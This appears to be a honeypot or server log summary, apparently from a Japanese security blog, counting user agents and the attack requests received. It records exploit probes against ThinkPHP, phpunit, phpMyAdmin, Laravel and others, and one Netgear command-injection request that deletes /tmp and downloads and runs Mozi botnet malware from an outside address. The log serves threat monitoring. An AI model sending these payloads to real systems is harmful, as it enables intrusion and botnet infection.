1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 OPR/50.0.2762.67
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.37
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 Gecko/20100101
2	Mozilla/5.0 zgrab/0.x
10	ZmEu
1	python-requests/2.18.4
1	python-requests/2.9.1

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
2		\x03
1		\x16\x03\x01
4		\x17\x03\x01\x01\x04e
2		\xbf\xbf\xaf\xaf~
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
2	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/c/	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
2	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
2	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//183[.]188[.]228[.]208:37606/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/api/jsonws/expandocolumn/update-column	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/ui/vropspluginui/rest/services/uploadova	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/version	HTTP/1.1
2	POST	/zend3/public/	HTTP/1.1
1	POST	http[:]//grzej[.]xyz/62819a067b42381ff4439ef8b6f1fa4b9ac729d5a09df7b6a63950303161a7c6d19f638066adeb675b02b14759be5508309a986ee130f7d65445e5e1ec5137c0fe18b0540a05d648af4c9207c39290cfafd0f57c82e29326234324967ec94946	HTTP/1.1
1	POST	http[:]//lisalancaster[.]site/364888b9c4ec718d093d4b3ae2793dcbab5fe31a3a085a619fed8dad4a769490a5705d039e34afdf55d5e306970d1fde91fa0231a5d70cdb43c6149fca6844fc914fa42847d22c69bb8e41794635120749481f92880fe12f89a6737916690f88	HTTP/1.1